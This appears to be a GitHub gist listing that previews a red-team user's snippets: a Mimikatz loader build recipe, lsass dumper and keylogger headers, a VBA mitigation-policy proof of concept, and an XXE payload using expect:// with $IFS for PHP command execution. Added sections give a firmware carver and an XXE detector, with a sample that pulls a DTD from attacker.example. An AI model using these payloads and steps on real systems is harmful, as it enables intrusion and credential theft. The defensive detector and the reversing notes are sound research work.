@mosesrenegade
mosesrenegade / PCMPBNMBAO_x86_poc.vba
Created Nov 4, 2019 — forked from xpn/PCMPBNMBAO_x86_poc.vba
PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON POC via VBA
' POC to spawn process with PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON mitigation enabled
' by @_xpn_
'
' Thanks to https://github.com/itm4n/VBA-RunPE and https://github.com/christophetd/spoofing-office-macro
Const EXTENDED_STARTUPINFO_PRESENT = &H80000        ' CreateProcess flag: lpStartupInfo points at a STARTUPINFOEX
Const HEAP_ZERO_MEMORY = &H8&                       ' HeapAlloc flag: zero-fill the allocation
Const SW_HIDE = &H0&                                ' wShowWindow value: spawn the child hidden
Const MAX_PATH = 260
Const PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = &H20007   ' attribute key passed to UpdateProcThreadAttribute
Steps.txt
1. Download the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases
2. Get the Mimikatz PE Loader from https://gist.github.com/pljoel/42dae5e56a86a43612bea6961cb59d1a
3. Use @pljoel's katz.cs file: uncomment the build lines in Delivery.Program.Main() and comment out the Exec() call.
4. Build it to generate file.b64, copy its contents and replace the Package.file string in payload.txt.
6. Make sure the payloadPath variable is set correctly in "TestAssemblyLoader.cs".
reversing-cisco-ios-raw-binary-firmware-images-with-ghidra.md

I was recently interested in reversing some older Cisco IOS images. Those images come in the form of a single binary blob, without any sort of ELF, Mach-O, or PE header to describe the binary.

While I am using Cisco IOS Images in this example, the same process should apply to other Raw Binary Firmware Images.

That makes importing this type of firmware file difficult, as Ghidra doesn't have any idea what type of ISA it needs to disassemble and decompile for.

The following are a few things I learned while trying to get the Cisco IOS image in a reversible state within Ghidra.

First I had to extract the image. The first 112 bytes of the firmware I received from the vendor are some sort of Cisco proprietary header that is not useful for our purpose. We need to extract the bzip2 archive that we are interested in. The easiest way to do that is binwalk:
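Added example, not part of the original write-up: the script below does the extraction step by hand in place of binwalk, so the header length and the end of the archive are visible rather than implied. It scans for the bzip2 stream signature instead of assuming a fixed 112-byte header, and uses the decompressor's leftover bytes to find where the archive ends, so a trailer after the archive is not swallowed. The image it builds (112-byte zero header, bzip2 body, 16-byte trailer) is constructed for illustration and is not a real Cisco header.

```python
#!/usr/bin/env python3
"""Locate and carve an embedded bzip2 stream out of a raw firmware blob.

Added example, not part of the original write-up: it does the binwalk
extraction step by hand so that the header length and the end of the
archive are visible. The image built by build_sample_image() is
constructed for illustration; its 112-byte zero header is a stand-in,
not a real Cisco header.
"""
import bz2
import re

# bzip2 stream header "BZh" + block-size digit, followed by the first
# block's magic 0x314159265359 ("1AY&SY"). Requiring both avoids false
# positives on a stray "BZh" in code or data.
BZ2_MAGIC = re.compile(rb"BZh[1-9]1AY&SY")


def find_bzip2_streams(blob):
    """Return the offset of every bzip2 stream header found in blob."""
    return [m.start() for m in BZ2_MAGIC.finditer(blob)]


def carve_bzip2(blob, offset):
    """Decompress the stream that starts at offset.

    Returns (payload, end_offset). end_offset is the first byte after the
    stream, taken from the decompressor's unused_data, so a vendor trailer
    following the archive is not mistaken for part of it.
    """
    dec = bz2.BZ2Decompressor()
    payload = dec.decompress(blob[offset:])
    if not dec.eof:
        raise ValueError("bzip2 stream at offset %d is truncated" % offset)
    end_offset = len(blob) - len(dec.unused_data)
    return payload, end_offset


def extract_image(blob):
    """Carve the first bzip2 stream and report where it sits in the image."""
    offsets = find_bzip2_streams(blob)
    if not offsets:
        raise ValueError("no bzip2 stream found in image")
    payload, end_offset = carve_bzip2(blob, offsets[0])
    return {
        "header_len": offsets[0],          # size of the proprietary header
        "stream_end": end_offset,
        "trailer_len": len(blob) - end_offset,
        "payload": payload,                # what gets loaded into Ghidra
    }


def build_sample_image():
    """Constructed stand-in for a vendor image: 112-byte header, bzip2
    body, 16-byte trailer. Neither header nor trailer is real Cisco data."""
    header = b"\x00" * 112
    body = bz2.compress(b"IOS-like code section " * 64)
    trailer = b"\xff" * 16
    return header + body + trailer


if __name__ == "__main__":
    import sys
    # Carve a real file if one is given, otherwise the constructed sample.
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            blob = fh.read()
    else:
        blob = build_sample_image()
    result = extract_image(blob)
    print("header_len=%d stream_end=%d trailer_len=%d payload=%d bytes" % (
        result["header_len"], result["stream_end"],
        result["trailer_len"], len(result["payload"])))
    with open("carved.bin", "wb") as fh:
        fh.write(result["payload"])
```

Run it with the image path as the only argument and the carved payload lands in carved.bin; on the constructed sample it reports header_len=112 and trailer_len=16. The header length it prints is what you would otherwise have to eyeball in a hex editor, and the truncation check matters because a partially downloaded or badly carved image decompresses silently to a short payload that Ghidra will happily mis-analyse.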

@mosesrenegade
mosesrenegade / autoProc.py
Created Aug 24, 2019 — forked from knavesec/autoProc.py
Automatic lsass dumper
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# A similar approach to smbexec but executing commands through WMI.
# Main advantage here is it runs under the user (has to be Admin)
# account, not SYSTEM, plus, it doesn't generate noisy messages
XXE RCE Expect PHP
What follows is how to trigger an RCE in PHP through the expect:// stream wrapper from an XXE. The problem is that spaces in the command are not interpreted correctly; a useful trick is to substitute $IFS (Bash's Internal Field Separator) for them. The other tip: don't allow XXE in the first place.
https://medium.com/@airman604/from-xxe-to-rce-with-php-expect-the-missing-link-a18c265ea4c7
```xml
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://ls$IFS-lahrt">]>
<entry>
```
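Added example, not from the gist or the linked article: a small detector that pulls external entity declarations out of XML request bodies and flags the PHP stream wrappers an XXE payload typically reaches for, including the $IFS space trick used above. The request bodies in SAMPLES are constructed. One caveat a defender should know: expect:// only works when the expect PECL extension is loaded, which stock PHP builds do not include, so the file:// and php:// findings matter even where an expect:// attempt would fail.

```python
#!/usr/bin/env python3
"""Flag XML bodies whose DOCTYPE declares external entities backed by PHP
stream wrappers (expect://, php://, file://, ...).

Added example, not part of the original gist or the linked article.
The request bodies in SAMPLES are constructed; the wrapper list is the
usual set abused in XXE payloads against PHP.
"""
import re

# Wrappers that turn an external entity into a file read, command
# execution (expect:// needs the expect PECL extension) or an outbound
# request used for blind / out-of-band exfiltration.
RISKY_WRAPPERS = ("expect://", "php://", "file://", "phar://", "glob://",
                  "data://", "http://", "https://", "ftp://", "gopher://")

# <!ENTITY name SYSTEM "uri">  or  <!ENTITY % name PUBLIC "id" "uri">
# XML keywords are case-sensitive, so SYSTEM / PUBLIC stay uppercase.
ENTITY_DECL = re.compile(
    rb'<!ENTITY\s+(?P<param>%\s*)?(?P<name>[\w.\-:]+)\s+'
    rb'(?:SYSTEM|PUBLIC\s+(?P<pq>["\'])[^"\']*(?P=pq))\s+'
    rb'(?P<q>["\'])(?P<uri>[^"\']*)(?P=q)'
)


def find_external_entities(body):
    """Return one finding per external entity declaration in body (bytes)."""
    findings = []
    for m in ENTITY_DECL.finditer(body):
        uri = m.group("uri")
        scheme = uri.lower()
        wrapper = next((w for w in RISKY_WRAPPERS
                        if scheme.startswith(w.encode())), None)
        findings.append({
            "name": m.group("name").decode(),
            # parameter entities (%name) are the usual vehicle for OOB XXE
            "parameter_entity": m.group("param") is not None,
            "uri": uri.decode(errors="replace"),
            "wrapper": wrapper,
            # $IFS / ${IFS} stands in for a space the wrapper would not pass
            "ifs_bypass": b"$IFS" in uri or b"${IFS}" in uri,
        })
    return findings


def verdict(body):
    """Coarse triage label for a request body."""
    found = find_external_entities(body)
    if not found:
        return "clean"
    if any(f["wrapper"] == "expect://" for f in found):
        return "rce-attempt"
    if any(f["wrapper"] for f in found):
        return "xxe"
    return "external-entity"


# Constructed request bodies: three attacks, one internal-only entity, one benign.
SAMPLES = {
    "expect_ifs": (b'<?xml version="1.0"?><!DOCTYPE foo [<!ELEMENT foo ANY >'
                   b'<!ENTITY xxe SYSTEM "expect://ls$IFS-lahrt">]>'
                   b'<entry><name>&xxe;</name></entry>'),
    "file_read": (b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
                  b'<foo>&xxe;</foo>'),
    "oob_param": (b'<!DOCTYPE foo [<!ENTITY % dtd SYSTEM '
                  b'"http://attacker.example/evil.dtd">%dtd;]><foo/>'),
    "internal_only": b'<!DOCTYPE foo [<!ENTITY greet "hello">]><foo>&greet;</foo>',
    "benign": b'<?xml version="1.0"?><entry><name>alice</name></entry>',
}


if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print("%-14s %s" % (label, verdict(body)))
        for f in find_external_entities(body):
            print("    entity=%s param=%s wrapper=%s ifs=%s uri=%s" % (
                f["name"], f["parameter_entity"], f["wrapper"],
                f["ifs_bypass"], f["uri"]))
```

The detector is deliberately keyed on the DOCTYPE rather than on the wrapper alone: a body that declares any external entity is already something a PHP endpoint should refuse, and matching the declaration catches the blind variant (a parameter entity pulling a remote DTD) that has no expect:// or file:// in the request at all.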
@mosesrenegade
mosesrenegade / booklist.txt
Created Sep 7, 2018
Reading List - Export list of some of the books on my kindle
.NET and COM: The Complete Interoperability Guide
@War: The Rise of the Military-Internet Complex
21st Century C: C Tips from the New School
3D Math Primer for Graphics and Game Development (Wordware Game Math Library)
A Guide to Claims-Based Identity and Access Control (Microsoft patterns & practices)
A Guide to Kernel Exploitation: Attacking the Core
A More Beautiful Question: The Power of Inquiry to Spark Breakthrough Ideas
A Primer of Analytic Number Theory: From Pythagoras to Riemann
Absolute FreeBSD, 2nd Edition: The Complete Guide to FreeBSD
Advanced C and C++ Compiling
@mosesrenegade
mosesrenegade / AtomicTestsCommandLines.txt
Created Sep 7, 2018
Atomic Tests - All Command Lines - Replace Input Arguments #{input_argument} - More Soon
_ _____ ___ __ __ ___ ____ ____ _____ ____ _____ _____ _ __ __
/ \|_ _/ _ \| \/ |_ _/ ___| | _ \| ____| _ \ |_ _| ____| / \ | \/ |
/ _ \ | || | | | |\/| || | | | |_) | _| | | | | | | | _| / _ \ | |\/| |
/ ___ \| || |_| | | | || | |___ | _ <| |___| |_| | | | | |___ / ___ \| | | |
/_/ \_\_| \___/|_| |_|___\____| |_| \_\_____|____/ |_| |_____/_/ \_\_| |_|
[********BEGIN TEST*******] Data Compressed T1002 has 3 Test(s)
RC4-no-swap.py
#!/usr/bin/env python
debug = 0
def KSA(key):
keylength = len(key)
if debug == 1:
print("Current Keylength is " + str(keylength))
@mosesrenegade
mosesrenegade / main.cpp
Created Mar 14, 2018 — forked from hasherezade/main.cpp
A tiny PE-sieve based process scanner
#include <stdio.h>
#include <windows.h>
#include <psapi.h>
#include <iostream>
#include <string>
#include <vector>
#include "pe_sieve_api.h"
#pragma comment(lib, "pe-sieve.lib")
@mosesrenegade
mosesrenegade / InstallUtilMouseKeyLogger.cs
Created Feb 26, 2018
Input Capture - InstallUtil Hosted MouseClick / KeyLogger -
using System;
using System.IO;
using System.Diagnostics;
using System.Windows.Forms;
using System.Configuration.Install;
using System.Runtime.InteropServices;
//KeyStroke Mouse Clicks Code
/*
* https://code.google.com/p/klog-sharp/
*/